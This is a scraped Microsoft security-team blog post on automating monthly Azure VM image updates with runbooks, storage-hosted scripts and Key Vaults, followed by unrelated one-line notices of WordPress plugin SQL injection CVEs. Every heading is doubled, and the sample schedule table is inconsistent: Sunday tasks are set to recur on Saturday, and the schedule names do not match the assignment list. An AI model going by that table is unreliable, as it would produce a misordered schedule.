To enable the automation aspect of this solution we need to add an automation account to the Resource Group ‘Templates’. Add an automation account, providing a relevant name, and ensure the ‘Create Azure Run As Account’ is set to ‘yes’.

For more details on automation accounts and creating them, see Create an Azure Automation account.

To enable the use of certain cmdlets in the runbooks we will create, first import/enable modules within the automation account that will be executing the scripts. Select the newly created automation account, then ensure the following modules are present. If they are not present; use the ‘add a module’ command to add them.

*   Azure
*   Azure.Storage
*   AzureRM.Automation
*   AzureRM.Compute
*   AzureRM.KeyVault
*   AzureRM.Network
*   AzureRM.Profile
*   AzureRM.Resources
*   AzureRM.Sql
*   AzureRM.Storage

**Step 3: Create runbooks Step 3: Create runbooks**

Now we need to create the runbooks, the PowerShell scripts the automation account will execute. To create a runbook, browse to the Runbooks section of the Automation Account. Resource Group > Automation Account > Runbooks and choose ‘Create a new runbook’.

To execute these scripts you will need to create a PowerShell Runbook, however there are more types of runbooks that can be created. We need to create a total of five runbooks which will cover the actions we want automated. These scripts are all in our GitHub Repository:

1.  **Build New Template to Update.ps1**

*   This script will deploy a VM from one of our images, ready for updating.

2.  **Invoke Updates.ps1**

*   This script will run a custom script extension on the deployed VM to make it download and execute “2a. WindowsUpdate.ps1”

3.  **Invoke Sysprep.ps1**

*   This script will run a custom script extension on the deployed VM to make it download and execute “3a. sysprep.ps1”

4.  **Snapshot and Move to SAs.ps1**

*   This script will take a snapshot of the updated and generalised VMs disk. It will create storage accounts in every available Azure region and copy the snapshot to each storage account. (This can be modified to limit the regions to those desired)

5.  **Create all Images and Cleanup**

*   This script creates VM images from the snapshots copied to each region, then removes everything created during this process as it is no longer needed.

Each of the scripts have been stripped of all variable names, so you will need to update them and save the runbooks before they can be run. The comments next to each variable should provide a description of what is needed for each.

For more information on creating runbooks and accessing the runbook tutorials see Create an Azure Automation runbook.

**Step 4: Create storage accounts and scripts Step 4: Create storage accounts and scripts**

To run scripts on the VM, we need to have the scripts available and in a location that can be updated independent of the VM. For this we will create a storage account which will be accessed by “2. Invoke Updates.ps1” and “3. Invoke Sysprep.ps1”.

In the Templates resource group, create a storage account, create a container within the ‘blobs’ section of this storage account, give it a name such as . “scripts” and upload the following two PowerShell files from GitHub:

*   2a. WindowsUpdate.ps1
    
    *   This script will download all available Windows updates and reboot the VM if required (https://social.technet.microsoft.com/Forums/en-US/52d9fe8d-936e-43c0-9707-51a55f97d59d/client-side-wsus-update-schedule#75c6e8b2-66c8-4ef1-a9a6-1853867999dc)
*   3a. sysprep.ps1
    
    *   This script will execute Sysprep with the flags ‘generalize’ and ‘OOBE’ (Out Of the Box Experience) and then shut down the VM.

Because these scripts are within a storage account and not on the VM, you can update them whenever you wish to include new functionality, such as updating, installing or removing applications.

**Step 5: Store credentials securely Step 5: Store credentials securely**

To manage the secrets and credentials of the VMs deployed from these images, we will utilise the Key Vault feature in Azure. We will need to create a Key Vault within both of the Resource Groups we are utilising: ‘Templates’ and ‘Deployed VMs’. During the creation process of both key vaults we need to ensure that the automation account created in Step 2 is added in the Access Policies as a principal with Secret Management as its permissions.

**Step 6: Test the process Step 6: Test the process**

At this point you should have a VM built and sysprepped, an automation account with the relevant modules enabled, five runbooks containing all of the automation (with variables populated), a storage account with the PowerShell scripts you want to execute to update the template, and two key vaults to store the secrets.

Before you go any further, it’s time to test (and debug if needed) what you have done so far. Navigate to the templates resource group, and execute the following runbooks in order:

1.  Start runbook ‘Snapshot and Move to SAs’
    
    *   Check the ‘all logs’ for information regarding the execution
2.  Wait 2-3 hours for the copy/move to complete.
    
3.  Start runbook ‘Create all Images and Cleanup’
    
    *   Check the ‘all logs’ for information regarding the execution
4.  Wait for this to complete ~10 minutes
    
5.  In the Azure Portal, select the Iiage you have just created and deploy a VM from the image, following the wizard to create the VM
    
6.  Wait 5-10 minutes for the VM to deploy
    
7.  Connect into the VM and verify that everything is working as expected.
    
8.  Delete the VM and associated resources (NSG, vNet etc.) that you have created and tested
    
9.  Start runbook ‘Build New Template to Update’
    
    1.  Check the ‘all logs’ for information regarding the execution
10.  Wait for the VM to deploy ~5 – 10 minutes
    
11.  Start runbook ‘Invoke Updates’
    
    *   Check the ‘all logs’ for information regarding the execution
    *   If you want to check that this ran on the VM you can check and review the log file in C:\\UpdateLogs
12.  Start runbook ‘Invoke sysprep’
    
    *   Check the ‘all logs’ for information regarding the execution
13.  Wait for Sysprep to complete ~15 – 20 minutes
    
    *   Your VM should be shut down and you should see no activity in the VM graphs, this will confirm that Sysprep worked correctly
14.  Finally delete the VM and associated resources (NSG, vNet etc.)
    

If you receive errors or failures, debug the runbook and re-test.

**Step 7: Schedule the process Step 7: Schedule the process**

Now you have a VM image deployed to all the regions you desire, you can set up the last part of the automation: configuring the schedule to run this process automatically. To do so, navigate to the automation account and schedules. Here, add multiple schedules to define the schedule for each task . To minimise disruption to end users, choose a time of low usage, such as Saturday night and Sunday morning. Whatever day you chose, we recommend that you keep the order and wait periods the same. For example:

Name

Start Date / Time

Time Zone

Recurrence

Deploy\_Sat\_PM

05/01/2019 23:00

UTC

Second Saturday of the month

Update\_Sun\_AM\_1

06/01/2019 00:00

UTC

Second Sunday of the month

Update\_Sun\_AM\_2

06/01/2019 01:00

UTC

Second Saturday of the month

Sysprep\_Sun\_AM

06/01/2019 02:00

UTC

Second Saturday of the month

CopyToSAs\_Sun\_AM

06/01/2019 04:00

UTC

Second Saturday of the month

ImageAndCleanup\_Sun\_AM

06/01/2019 07:00

UTC

Second Saturday of the month

Assign the relevant runbook to the schedules we have just created:

*   Schedule Name Associated Runbook
*   Deploy_Saturday_PM DeployTemplateVM
*   Update_Sunday_AM_1 InvokeUpdate
*   Update_Sunday_AM_2 InvokeUpdate
*   Sysprep_Sunday_AM InvokeSysprep
*   CopyToSAs_Sunday_AM SnapshotAndCopy
*   ImageAndCleanup_Sunday_AM ImageAndCleanup

**Now investigate Now investigate**

The automation we have just created will ensure that the VM images that are deployed to all Azure regions are up to date and ready to be used.

To build one of these VMs, run the PowerShell script ‘CreateVM.ps1’ (this will need variables configured before it is distributed). This will ask you for both the region you want to deploy it to and a unique ID for the VM. Once deployed, you can log in with the username configured in the script and the corresponding password in the ‘Deployed VMs’ Key Vault. When you are finished with your VM you can delete it (and its associated resources) using the DeleteVM.ps1 and the VM’s unique ID.

You now have your VM toolbox set up and need something to do with it. In our next blog in this series, we’ll explain how to get a VM for investigation.

_Scott Miller, Senior Service Engineer, MSRC_

Scalable infrastructure for investigations and incident response

The rsvpmaker plugin before 6.2 for WordPress has SQL injection.

CVE-2019-15646: RSVPMaker

The rsvpmaker plugin before 5.6.4 for WordPress has SQL injection.

CVE-2018-21004

The cforms2 plugin before 14.6.10 for WordPress has SQL injection.

Tag

#sql